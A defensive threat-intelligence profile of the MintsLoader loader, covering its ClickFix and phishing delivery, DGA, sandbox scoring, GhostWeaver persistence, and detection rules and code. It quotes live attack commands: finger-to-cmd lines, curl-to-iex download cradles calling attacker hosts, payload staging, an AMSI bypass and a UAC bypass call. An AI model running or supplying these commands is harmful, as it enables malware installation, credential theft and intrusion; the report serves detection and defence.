# MintsLoader (TAG-124 / LandUpdate808 / UNC4108)

**Type:** Malware loader - PowerShell-based, multi-stage delivery platform

**Also tracked as:** TAG-124 (Recorded Future), LandUpdate808 (Proofpoint), UNC4108

**First observed:** February 2023 (Orange Cyberdefense); widespread campaigns from mid-2024 onward

**Status:** Active. Two concurrent C2 clusters operational as of March 2026: 178.156.128.182 (v0.20, Hetzner) and 86.107.101.93 (v0.23, Redoubt Networks). 35 documented campaign IDs. 200+ DGA domains across four clusters spanning February 2024 through March 2026.

---

## Threat Overview

Pure-function loader with no intrinsic capabilities beyond payload delivery. It runs a multi-stage JavaScript-to-PowerShell chain, uses a date-seeded DGA for C2 resolution, scores the victim environment with WMI-based anti-sandbox checks, and delivers GhostWeaver (primary), StealC, or modified BOINC clients to real machines while serving decoys to sandboxes. Campaigns target the industrial, legal, and energy sectors in the US and Europe. SocGholish operators were early adopters; TAG-124/LandUpdate808 is the primary sustained operator.

MintsLoader occupies the same niche as GootLoader, Bumblebee, and Latrodectus: a loader-for-hire that bridges initial access to post-exploitation tooling. The bidirectional relationship with GhostWeaver (GhostWeaver can redeploy MintsLoader via `sendPlugin`) suggests tight operational integration rather than a pure buyer-seller dynamic.
| Field | Value |
|---|---|
| Subject | MintsLoader - multi-stage malware loader |
| Severity | High |
| Exploitation status | In-the-wild, active campaigns |
| Affected scope | Industrial, legal, energy sectors; US and Europe; Windows endpoints |
| First seen | 2023-02 (Orange Cyberdefense); broad campaigns 2024-07 onward |
| Primary payload | GhostWeaver PowerShell RAT |
| Secondary payloads | StealC infostealer, modified BOINC client |
| Operator | TAG-124 / LandUpdate808 (primary); SocGholish/TA569 (early adopter) |

---

## Activity Standing

Active and expanding. TAG-124 runs two concurrent C2 clusters (v0.20 and v0.23) with 35 documented campaign IDs, indicating sustained multi-wave operations. SocGholish adopted MintsLoader circa July 2024 as an alternative delivery chain, adding drive-by compromise on top of TAG-124's phishing campaigns.

Infrastructure has migrated from anonymous VPS providers (BLNWX AS) to bulletproof hosters: Stark Industries Solutions (AS44477), GWY IT Pty Ltd (AS199959), and SCALAXY-AS (AS58061, operated by 3NT Solutions/IROKO Networks/Inferno Solutions), indicating operator investment in resilience. Linked earlier infrastructure (`amatua[.]org`, 2022; `happychristmas[.]click`) suggests operator activity predating the MintsLoader branding.

---

## Delivery Method

**Primary: Phishing emails (TAG-124)**

Spam emails target the electricity, oil/gas, and legal services sectors. Two attachment types are observed:

1. **JScript attachment:** Filename pattern `Fattura[0-9]{8}.js` (Italian invoice lures distributed via PEC certified email). After a 13-second sleep, WScript.Shell spawns PowerShell, which fetches stage 1 via `curl`.
2. **ClickFix/Kongtuke link:** The email links to a fake "Click to verify" page that instructs the victim to copy and paste a command into the Windows Run dialog. The pasted command executes `finger.exe` or PowerShell to download MintsLoader.
**Secondary: Drive-by compromise (SocGholish/TA569)**

SocGholish operators inject fake browser-update overlays into compromised websites. Visitors who click the "update" download MintsLoader instead of a legitimate browser update. Adopted circa July 2024 as an alternative to SocGholish's native payload chain.

**ClickFix observed commands:**

- `cmd /c "finger gcaptcha@humver[.]top|cmd"`
- `cmd /c "finger cloudflare@cfcheckver[.]top|cmd"`
- `cmd /c "finger [email protected][.]108|cmd"`

These abuse `finger.exe`, a legitimate Microsoft-signed binary from the obsolete Finger protocol. It remains on modern Windows, is rarely monitored, and can make outbound network connections. The server's response is piped directly into `cmd` for execution.

---

## Delivers To

| Payload | Type | Notes |
|---|---|---|
| **GhostWeaver** | PowerShell RAT | Primary payload across all campaigns. Port 25658, TLS 1.0, self-signed cert (CN=GeoTrust LTD.), pinned. Mutex `euzizvuze`. Plugin system via reflective .NET loading. Can redeploy MintsLoader. Four persistence modes (plaintext, DPAPI, DPAPI+hardcoded, ECHO). UAC bypass via CMSTPLUA COM. Scheduled task: `conhost --headless powershell -ep bypass Azure{FunctionName}` every 3 min. Registry marker: `HKCU:\Software\Microsoft\ExpirienceHost`. Hardcoded DNS resolvers bypass corporate filtering. |
| **StealC** | Infostealer | MaaS by developer "Plymouth." Targets browser credentials, extensions, crypto wallets, email, financial tokens. Downloads sqlite3.dll/nss3.dll dependencies. HTTP POST exfiltration. XOR-encrypted strings. Exits if username = "JohnDoe." |
| **Modified BOINC** | Cryptomining/compute theft | Modified Berkeley Open Infrastructure client connecting to attacker-controlled project servers. Linked domains: `rosettahome[.]top`, `rosettahome[.]cn` (fake Rosetta@home pages). |
| **Decoy payload** | Sandbox deflection | AsyncRAT downloaded from `temp[.]sh`, served to high-scoring (VM/sandbox) environments. |

---

## Infection Chain

### Step 1 - Delivery: JScript Dropper / ClickFix Page

T1566.001, T1566.002, T1189, T1218 | TAG-124, SocGholish/TA569

A phishing email delivers a heavily obfuscated JScript file (`Fattura[0-9]{8}.js`) or links to a ClickFix/Kongtuke fake update page. The JScript has three observed variants: cleartext PowerShell with a hardcoded C2; character-replaced obfuscation that rebuilds the download cradle; and a Base64-encoded variant that writes temporary PS1 files with random names to `C:\Users\Public\Documents\`. ClickFix pages instruct the victim to paste `finger.exe` commands that pipe the output to `cmd`. SocGholish injects fake browser-update overlays into compromised sites.

All paths converge on `curl -useb http://[domain]/1.php?s=[campaign_ID]` (in Windows PowerShell, `curl` is a built-in alias for `Invoke-WebRequest` and `-useb` abbreviates `-UseBasicParsing`, so this is not `curl.exe`). The JScript self-deletes after execution.

> **Detection Opportunity:** Monitor for user-launched JScript files (.js) spawning PowerShell or cmd child processes from Explorer or email-client contexts. For drive-by delivery, watch for browser processes spawning script interpreters. The `finger.exe` LOLBin abuse is a significant detection gap in most environments: any `finger.exe` process making outbound network connections or piping output to `cmd`/`powershell` is almost certainly malicious on modern networks.

### Step 2 - Execution: PowerShell Stager (MintsLoader Core)

T1059.001, T1562.001, T1027, T1140 | MintsLoader

The HTTP response returns a Base64-encoded, XOR-encrypted payload. Once decoded and decompressed, the heavily obfuscated PowerShell bypasses AMSI (sets `amsiInitFailed` on `System.Management.Automation.AmsiUtils` to `$true`), runs environment scoring (Step 3), executes the DGA to generate C2 domains, and calls back with the score and system info. Callback URL: `http://{DGA_domain}/{random}htr{random}.php?id={COMPUTERNAME}&key={SCORE}&s={CAMPAIGN_ID}`.

Obfuscation uses arithmetic character encoding: every string is constructed via math expressions without `[char]` casts, e.g. `@((8306-8191),(7691-7583),...) -join ''`.
Analysis across five decoded samples: 840-886 encoded strings per build, helper class names randomized per compilation, decoded artifact sizes of 32K-103K, and a unique 15-character mixed-case encryption key per build. A newer variant (Blackpoint Cyber, 2025) uses hashtable-based decoding: it maps three-character tokens to individual bytes, processes encoded strings in fixed chunks, and loads Base64-encoded, Gzip-compressed .NET assemblies via reflection.

> **Detection Opportunity:** PowerShell executing heavily obfuscated payloads with hidden windows, `Invoke-Expression` calls on remote content, and payload-reconstruction patterns are strong signals. Watch for AMSI bypass attempts: any PowerShell process referencing `amsiInitFailed`, `AmsiUtils`, or `amsiContext` in command-line arguments or script blocks is a high-fidelity indicator.
>
> See rule: [[edr-win-def-defender-tampering]]

### Step 3 - Evasion: WMI Environment Scoring

T1497.001 | MintsLoader

Three WMI checks produce a cumulative score that determines whether the C2 serves the real payload or a decoy:

- Check 1: `Get-MpComputerStatus` for `IsVirtualMachine` (real machine: ~6.7B increment; VM: ~52.1B or more).
- Check 2: `Win32_VideoController` `AdapterDACType` - "Internal"/"Integrated RAMDAC" means physical (0); "VMware"/"Bochs"/"SeaBIOS" means virtual (+8.8B to +74.9B).
- Check 3: `Win32_CacheMemory` `Purpose` - 4 or more cache levels means real (0); 3 or fewer means emulated (+32.3B).

Real machine total: ~7.2B. Triage sandbox VM: ~160B (22x higher). Additional checks (eSentire): exits if single core, <1111 MB RAM, vertical resolution <666px, or a CIS language (Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan).

> **Detection Opportunity:** Watch for PowerShell processes issuing WMI queries against `Win32_VideoController`, `Win32_CacheMemory`, and `IsVirtualMachine` in rapid succession. This combination of GPU adapter type, CPU cache depth, and VM status queries from a single PowerShell process is highly anomalous and strongly indicative of automated sandbox detection.
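The detection opportunities from Steps 1 through 3 (a `finger` command piped into a shell, a script host spawning PowerShell, the `curl -useb` cradle, AMSI bypass strings, and the three-query WMI battery correlated per process) can be prototyped against telemetry before they go into a SIEM. The following is an added example, not code from the report or any cited vendor; the event records are constructed, their field names only loosely follow Sysmon Event ID 1 and PowerShell 4104, and the rule names and fidelity labels are taken from the summary table on this page.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from a real incident). "process" records
# mimic Sysmon Event ID 1 fields; "scriptblock" records mimic PowerShell 4104.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4101, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c "finger gcaptcha@example.invalid|cmd"'},
    {"type": "process", "pid": 4102, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c iex (curl -useb http://example.invalid/1.php?s=CAMPAIGN_ID)"},
    {"type": "scriptblock", "pid": 4102,   # truncated, non-functional stand-in for the AMSI patch
     "text": "<...> System.Management.Automation.AmsiUtils <...> amsiInitFailed <...> $true"},
    {"type": "scriptblock", "pid": 4102, "text": "Get-MpComputerStatus | Select IsVirtualMachine"},
    {"type": "scriptblock", "pid": 4102, "text": "Get-CimInstance Win32_VideoController | Select AdapterDACType"},
    {"type": "scriptblock", "pid": 4102, "text": "Get-CimInstance Win32_CacheMemory | Select Purpose"},
    {"type": "process", "pid": 5200, "parent_image": r"C:\Windows\explorer.exe",   # benign admin use
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},
]

FINGER_PIPE = re.compile(r"finger\s+\S+@\S+\s*\|\s*(cmd|powershell)", re.I)
AMSI_STRINGS = re.compile(r"amsiInitFailed|AmsiUtils|amsiContext", re.I)
CRADLE = re.compile(r"\biex\b.*curl\s+-useb|curl\s+-useb\s+\S*/1\.php\?s=", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
WMI_BATTERY = ("win32_videocontroller", "win32_cachememory", "isvirtualmachine")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: list[dict]) -> dict[int, dict[str, str]]:
    """Map pid -> {rule_name: fidelity} for every process that matched a rule.
    The WMI battery is stateful: it fires only once all three artefacts have
    been seen in the same pid, which separates it from routine admin scripting
    that touches one class at a time."""
    hits: dict[int, dict[str, str]] = defaultdict(dict)
    wmi_seen: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        pid = ev["pid"]
        text = ev["cmdline"] if ev["type"] == "process" else ev["text"]
        if ev["type"] == "process":
            if FINGER_PIPE.search(text):
                hits[pid]["finger_lolbin_pipe"] = "HIGH"
            if (basename(ev["parent_image"]) in SCRIPT_HOSTS
                    and basename(ev["image"]) in POWERSHELL):
                hits[pid]["script_host_spawns_powershell"] = "LOW-MEDIUM"
            if CRADLE.search(text):
                hits[pid]["curl_useb_cradle"] = "MEDIUM"
        if AMSI_STRINGS.search(text):
            hits[pid]["amsi_bypass_strings"] = "HIGH"
        lowered = text.lower()
        wmi_seen[pid].update(m for m in WMI_BATTERY if m in lowered)
        if len(wmi_seen[pid]) == len(WMI_BATTERY):
            hits[pid]["wmi_sandbox_scoring_battery"] = "MEDIUM"
    return dict(hits)


if __name__ == "__main__":
    for pid, rules in evaluate(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The benign `Get-Process` launch from Explorer produces no hit, which is the false-positive check worth keeping as the rule set grows.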
### Step 4 - C2 Resolution: Domain Generation Algorithm

T1568.002 | MintsLoader, GhostWeaver

Four distinct DGA algorithms are used across the kill chain stages:

- **DGA1 (MintsLoader delivery):** `System.Random` seeded with day-of-month + a hardcoded constant; generates 10 candidate 15-character domains from a lowercase alphanumeric charset under the `.top` TLD, rotating daily. The loader iterates the domains attempting an HTTP GET to `1.php?s=<GUID>`, pipes the response to `iex`, and breaks on the first valid payload.
- **DGA2 (GhostWeaver C2):** seed formula `[int](DayOfYear / 7 + 1 + Year * 854374)` for v0.20, `* 348374` for v0.23; weekly rotation; multiple TLDs.
- **DGA3 (TDS launcher):** `(DayOfYear+3)/7` formula; `.top` TLD; weekly rotation.
- **DGA4 (Scoring callback):** `a-n` charset; per-deployment seed.

All four use .NET `System.Random` (Knuth's subtractive generator). All DGA domains are registered through NICENIC with Hurricane Electric nameservers, with a consistent registrant fingerprint: name hash `1f8f4166599d23ee`.

> **Detection Opportunity:** Network-level detection is primary here. Monitor for rapid iteration of DNS queries to `.top` domains with 15-character alphanumeric labels, especially from PowerShell processes. The NICENIC registrar and Hurricane Electric nameserver combination is a useful enrichment pivot. On the endpoint, watch for PowerShell command lines containing `.top` TLD references combined with `iex`/`Invoke-Expression` or `1.php` URI patterns.

### Step 5 - Payload Delivery: Score-Gated Drop

T1105 | MintsLoader C2

The C2 evaluates the `key` parameter (environment score). Real machines (score ~7.2B) receive GhostWeaver, StealC, or BOINC. Sandboxes/VMs (score ~160B) receive decoy executables (AsyncRAT from `temp[.]sh`). StealC exits if the username is "JohnDoe" (a common sandbox default).

> **Detection Opportunity:** Monitor for PowerShell-based remote script retrieval, particularly `curl -useb` download cradles piped to `Invoke-Expression`. The callback URL patterns (`1.php?s=`, `htr.php?id=`) are useful for network-level signature development.
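Step 4 notes that every DGA stage rests on .NET `System.Random`, so pre-computing domains for blocking only needs a bit-exact port of that generator plus the seed formula. The following is an added example (not code from the report or from any vendor): a Python port of the seeded `System.Random` algorithm, the DGA2 seed formula exactly as quoted above, and a DGA1-shaped generator. The DGA1 per-build constant is not public here and must be supplied from a sample, and the one-`Next()`-per-character draw pattern in `candidate_domains` is an assumption to confirm against the binary before acting on its output.

```python
MBIG = 2**31 - 1       # int.MaxValue
MSEED = 161803398      # Knuth subtractive-generator constant used by .NET
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"  # DGA1 charset per the report


class DotNetRandom:
    """Port of System.Random(int seed): .NET Framework, and the legacy path
    .NET Core/5+ still use whenever an explicit seed is supplied."""

    def __init__(self, seed: int) -> None:
        arr = [0] * 56
        mj = MSEED - (MBIG if seed == -2**31 else abs(seed))
        arr[55], mk = mj, 1
        for i in range(1, 55):
            ii = (21 * i) % 55
            arr[ii] = mk
            mk = mj - mk
            if mk < 0:
                mk += MBIG
            mj = arr[ii]
        for _ in range(4):                       # four mixing passes
            for i in range(1, 56):
                arr[i] -= arr[1 + (i + 30) % 55]
                if arr[i] < 0:
                    arr[i] += MBIG
        self._arr, self._inext, self._inextp = arr, 0, 21

    def next_raw(self) -> int:
        """Random.Next(): next value in [0, int.MaxValue)."""
        self._inext = 1 if self._inext >= 55 else self._inext + 1
        self._inextp = 1 if self._inextp >= 55 else self._inextp + 1
        ret = self._arr[self._inext] - self._arr[self._inextp]
        if ret == MBIG:
            ret -= 1
        if ret < 0:
            ret += MBIG
        self._arr[self._inext] = ret
        return ret

    def next(self, max_value: int) -> int:
        """Random.Next(maxValue) = (int)(Sample() * maxValue); keep .NET's
        operand order so the double rounding matches bit for bit."""
        return int(self.next_raw() * (1.0 / MBIG) * max_value)


def dga1_seed(day_of_month: int, per_build_constant: int) -> int:
    """DGA1 (MintsLoader delivery): day-of-month + hardcoded constant. The
    constant is not public here; pass the value recovered from your sample."""
    return day_of_month + per_build_constant


def dga2_seed(year: int, day_of_year: int, multiplier: int = 854374) -> int:
    """DGA2 (GhostWeaver): [int](DayOfYear / 7 + 1 + Year * M), M = 854374
    for v0.20 and 348374 for v0.23. PowerShell's [int] on a double rounds
    half-to-even rather than truncating, so the weekly seed change lands
    where DayOfYear/7 crosses .5; Python's round() rounds the same way."""
    return round(day_of_year / 7 + 1 + year * multiplier)


def candidate_domains(seed: int, count: int = 10, length: int = 15,
                      charset: str = CHARSET, tld: str = "top") -> list[str]:
    """DGA1-shaped output per the report: one seeded stream, `count` labels
    of `length` chars. ASSUMPTION: one Next(charset.Length) draw per char
    with no interleaved draws; confirm against the sample before blocking."""
    rng = DotNetRandom(seed)
    return ["".join(charset[rng.next(len(charset))] for _ in range(length))
            + "." + tld for _ in range(count)]
```

`DotNetRandom(0).next_raw()` returns 1559595546, the well-known first output of `new Random(0).Next()`, which is the quickest check that the port is faithful before trusting any domain list it produces.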
### Step 6 - Persistence: GhostWeaver Installation

T1053.005, T1112, T1548.002, T1055, T1620 | GhostWeaver

GhostWeaver installs via one of four persistence modes: (1) a plaintext `.log` file loaded with obfuscated `Get-Content` + `Invoke-Expression`; (2) a DPAPI-encrypted payload with a DGA4 callback for a custom decryption stub; (3) DPAPI-encrypted with a hardcoded decryption stub and a `.jpg` trampoline; (4) ECHO - DPAPI-encrypted with clipboard-chain decryption. Scheduled task: `conhost --headless powershell -ep bypass Azure{FunctionName}` every 3 minutes. Payload location: `%LOCALAPPDATA%\Microsoft\{subfolder}\{FunctionName}.log`. Registry marker: `HKCU:\Software\Microsoft\ExpirienceHost` = 1 (intentional misspelling).

UAC bypass via the CMSTPLUA COM object: PEB masquerade via `VirtualProtectEx`/`WriteProcessMemory` to impersonate `explorer.exe`, then COM elevation via `CoGetObject("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}")`. Disables Task Scheduler operational logs (`IsEnabled=False`).

C2: port 25658, TLS 1.0 only, self-signed X.509 cert (CN=GeoTrust LTD., RSA 4096, SHA-512, valid 2023-12-04 to 9999-12-31), cert SHA256 `aa9bc093018e55b23fbb4d9548c4140a3f59162a216ba2df6c82691533dcb435`, client-side cert pinning, SNI set to the IP. Plugins are loaded reflectively via `Assembly.Load` (never written to disk) and obfuscated with Confuser.Core 1.6. Known plugins: formgrabber, browser credential theft (Brave/Chrome/Firefox/Edge), Outlook extraction, crypto wallet theft. Hardcoded DNS resolvers: `216.218.130.2`, `74.82.42.42`, `208.67.222.222`, `76.76.2.5`, `1.1.1.1`.

> **Detection Opportunities:**
> - **Scheduled task abuse:** Watch for scheduled tasks executing `conhost --headless` that spawn PowerShell with `-ep bypass`. Legitimate `conhost.exe` usage does not include the `--headless` flag with a PowerShell child process; this is a high-fidelity behavioral indicator.
> - **Registry persistence marker:** Monitor for creation or modification of registry values under `HKCU:\Software\Microsoft\ExpirienceHost` (note the intentional misspelling of "Experience").
> - **UAC bypass via CMSTPLUA COM:** Detect `CoGetObject` calls referencing CLSID `{A6BFEA43-501F-456F-A845-983D3AD7B8F0}`, or monitor for processes performing PEB masquerade (writing to their own PEB via `VirtualProtectEx`/`WriteProcessMemory` to impersonate explorer.exe before COM elevation).
> - **TLS certificate fingerprint:** Port 25658/tcp, TLS 1.0, cert SHA256 `aa9bc093018e55b23fbb4d9548c4140a3f59162a216ba2df6c82691533dcb435`. Network-level detection only.
> - **Mutex:** `euzizvuze` - requires memory or handle telemetry.

---

## Raw Command Lines

Observed operator commands from IR reports and malware analysis. `[R]` = reconstructed from described behavior.

**ClickFix delivery**

```
cmd /c "finger gcaptcha@humver[.]top|cmd"
cmd /c "finger cloudflare@cfcheckver[.]top|cmd"
cmd /c "finger [email protected][.]108|cmd"
```

**JScript download cradle (all variants)**

```
curl -useb http://[domain]/1.php?s=[campaign_ID]
```

**Deobfuscated stager (Blumira sample)**

```
$updgzrfsqcnht = 'ur'
Set-Alias mitresa c$($updgzrfsqcnht)l
iex (curl -useb http://windowsliveupdater[.]com/spo.ps1)
```

**Payload staging**

```
curl -s -L -o C:\Users\admin\AppData\Local\[randomized].pdf midpils.com/ujn.jpg
tar -xf C:\Users\admin\AppData\Local\[randomized].pdf -C [target_directory]
powershell -Command "Invoke-CimMethod -ClassName Win32_Process..." [R]
```

**GhostWeaver persistence (scheduled task)**

```
conhost --headless powershell -ep bypass Azure{FunctionName} [R]
```

**GhostWeaver UAC bypass**

```
CoGetObject("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}") [R]
```

---

## Detection Opportunities Summary

The following behavioral indicators are actionable on any endpoint detection platform. Ordered by fidelity.
| Behavior | Fidelity | What to Look For |
|---|---|---|
| `finger.exe` outbound + pipe to cmd/powershell | HIGH | Any `finger.exe` process making network connections, or a command line containing `\|cmd` or `\|powershell`. Near-zero legitimate use on modern networks. |
| `conhost --headless` spawning PowerShell | HIGH | Parent process `conhost.exe` with the `--headless` flag creating a PowerShell child with `-ep bypass`. Not observed in legitimate use. |
| AMSI bypass strings in PowerShell | HIGH | PowerShell script blocks or command lines containing `amsiInitFailed`, `AmsiUtils`, or `amsiContext`. |
| Registry key `ExpirienceHost` | HIGH | Creation or modification of `HKCU:\Software\Microsoft\ExpirienceHost`. The intentional misspelling makes this a precise indicator. |
| WMI sandbox scoring battery | MEDIUM | PowerShell querying `Win32_VideoController`, `Win32_CacheMemory`, and `IsVirtualMachine` in a single session. |
| `curl -useb` piped to `iex` | MEDIUM | PowerShell download-cradle pattern. Common across multiple loaders but reliable when combined with other chain indicators. |
| Rapid .top domain DNS iteration | MEDIUM | DNS queries to multiple 15-character `.top` domains in rapid succession from a single endpoint. Network-level. |
| Port 25658 TLS 1.0 with self-signed cert | MEDIUM | Outbound connection to port 25658 using TLS 1.0 with CN=GeoTrust LTD. Network-level. |
| JScript/WScript spawning PowerShell | LOW-MEDIUM | `wscript.exe` or `cscript.exe` creating a `powershell.exe`/`pwsh.exe` child. Legitimate use exists but is uncommon. |

---

## Intelligence Gaps

- **Monetization chain unclear** - GhostWeaver provides persistent access, but the downstream buyer (ransomware operator, data broker) is not publicly documented. If TAG-124 sells access as TA569 does, mapping the buyer-seller relationship changes the severity assessment.
- **BOINC purpose ambiguous** - The modified BOINC client connects to attacker infrastructure, but whether this is cryptomining, distributed computing for password cracking, or something else is not confirmed in public reporting.
- **GhostWeaver plugin inventory incomplete** - Only formgrabber, browser stealer, Outlook, and crypto wallet plugins are documented. The `sendPlugin` architecture suggests additional modules exist.
- **DGA prediction tools absent** - No public DGA prediction/generation script exists for proactive domain blocking, despite the algorithm being well documented. Orange Cyberdefense's GitHub repo has IOCs and YARA but not a DGA generator.
- **AsyncRAT ecosystem overlap unresolved** - Early GhostWeaver samples were misclassified as AsyncRAT (Palo Alto Unit42). Whether shared certificate-generation practices indicate operational overlap or coincidence is unresolved.

---

## Confidence Assessment

| Claim | Confidence | Evidence | Flips if... |
|---|---|---|---|
| TAG-124 is primary MintsLoader operator | HIGH | Recorded Future Insikt Group campaign tracking, consistent campaign IDs | Discovery of an independent operator using the same tooling |
| GhostWeaver is primary payload | HIGH | Recorded Future, derp.ca, multiple campaign observations | Shift to a different primary payload in future campaigns |
| SocGholish adopted MintsLoader mid-2024 | HIGH | Orange Cyberdefense timeline, Recorded Future | Earlier samples surfacing |
| DGA uses day-of-month seed (DGA1) | HIGH | eSentire, Recorded Future, Blackpoint code analysis | Algorithm update in newer variants |
| Environment scoring determines payload delivery | HIGH | Recorded Future code analysis, sandbox vs. real scoring | C2 logic change |
| Industrial/legal/energy sector targeting | MEDIUM | eSentire, Recorded Future sector observations | Broadening to other verticals |
| Bulletproof hosting migration for resilience | MEDIUM | Recorded Future infrastructure analysis | Return to anonymous VPS |
---

## ATT&CK Mapping

| Technique | ID | Chain Phase |
|---|---|---|
| Phishing: Spearphishing Attachment | T1566.001 | Delivery |
| Phishing: Spearphishing Link | T1566.002 | Delivery |
| Drive-by Compromise | T1189 | Delivery (SocGholish) |
| System Binary Proxy Execution | T1218 | Delivery (finger.exe LOLBin) |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Execution |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Defense Evasion (AMSI bypass) |
| Obfuscated Files or Information | T1027 | Defense Evasion |
| Deobfuscate/Decode Files or Information | T1140 | Defense Evasion |
| Virtualization/Sandbox Evasion: System Checks | T1497.001 | Defense Evasion |
| Dynamic Resolution: Domain Generation Algorithms | T1568.002 | C2 |
| Ingress Tool Transfer | T1105 | Payload delivery |
| Scheduled Task/Job: Scheduled Task | T1053.005 | Persistence |
| Modify Registry | T1112 | Persistence |
| Abuse Elevation Control Mechanism: Bypass UAC | T1548.002 | Privilege Escalation |
| Process Injection | T1055 | Defense Evasion |
| Reflective Code Loading | T1620 | Execution |

---

## Detections

Sigma rules applicable to this threat:

| Rule ID | Description |
|---|---|
| [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell |
| [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution |

---

## Key Publications

1. [Recorded Future Insikt Group - Uncovering MintsLoader With Recorded Future Malware Intelligence Hunting](https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting) (2025-04-29)
2. [Recorded Future Insikt Group - Full PDF Report (CTA-2025-0429)](https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0429.pdf) (2025-04-29)
3. [eSentire TRU - MintsLoader: StealC and BOINC Delivery](https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery) (2025-01)
4. [derp.ca - GhostWeaver: A Malware That Lives Up to Its Name](https://www.derp.ca/research/ghostweaver-tag124-powershell-rat/) (2026-03)
5. [Blackpoint Cyber - New MintsLoader Variant Using Hashtable Obfuscation](https://blackpointcyber.com/blog/mintsloader-finger-protocol-hashtable-obfuscation/) (2025)
6. [Blumira - How MintsLoader Uses a Legacy Windows Binary to Gain a Foothold](https://www.blumira.com/blog/how-mintsloader-uses-a-legacy-windows-binary-to-gain-a-foothold) (2025)
7. [cert-orangecyberdefense/mintsloader - GitHub IOC Repository](https://github.com/cert-orangecyberdefense/mintsloader) (ongoing)
8. [eSentire IOCs - MintsLoader/StealC January 2025](https://github.com/eSentire/iocs/blob/main/MintsLoader/MintsLoader_Stealc_01_14_2025.txt)
9. [SANS ISC - KongTuke Activity](https://isc.sans.edu/diary/KongTuke%20activity/32498) (2025)
10. [MITRE ATT&CK - T1568.002 Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002/)